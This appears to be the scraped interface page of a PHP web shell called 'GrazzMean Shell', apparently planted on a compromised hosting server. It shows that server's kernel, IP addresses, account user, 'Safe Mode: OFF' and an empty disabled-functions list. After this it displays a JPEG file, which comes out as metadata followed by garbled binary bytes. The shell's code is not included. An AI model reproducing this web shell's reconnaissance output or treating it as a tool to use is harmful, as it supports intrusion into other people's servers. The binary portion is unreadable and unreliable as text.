shell bypass 403

GrazzMean Shell

Uname: Linux premium264.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.3.22 [ PHP INFO ] PHP os: Linux
Server Ip: 69.57.162.13
Your Ip: 216.73.216.219
User: workvvfb (1129) | Group: workvvfb (1084)
Safe Mode: OFF
Disable Function:
NONE

name : 01-smart-watch-Main-Image-36x15.jpg
���JFIF��ExifII*��http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:0D32B78E663711EDB8949FAD19F1B024" xmpMM:InstanceID="xmp.iid:0D32B78D663711EDB8949FAD19F1B024" xmp:CreatorTool="Adobe Photoshop 2021 Windows"> <xmpMM:DerivedFrom stRef:instanceID="F7DC3B19E6DF3F2493F5536ABFED188C" stRef:documentID="F7DC3B19E6DF3F2493F5536ABFED188C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��C				

!'"#%%%),($+!$%$��C				$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$��$����)!1AQa�"#2�����(!Qa�"1�#Aq���?t)�!{yb*�Q�N�3n�dZZ�/����z�aap����=M���#A���X�rI������K�}f�ɨ�6�������{<f�'tc��ǾY��P�?*f�|���|��8�
��&��H�=���l��1[r���l9�Q4���moQ�D[ݛ���8���N;���̹$��Z�=��N�U5J�3�j�'�����V�u?�'T�nWC�C�2i:�_A�Q��mFL�ڛ���ǶPC�CJ�q
BT�=)J�����s��c���:�`<����DjT��#b�I�$*��1*�r���{}��*V���?-ah��k�`x(�w%��
© 2025 GrazzMean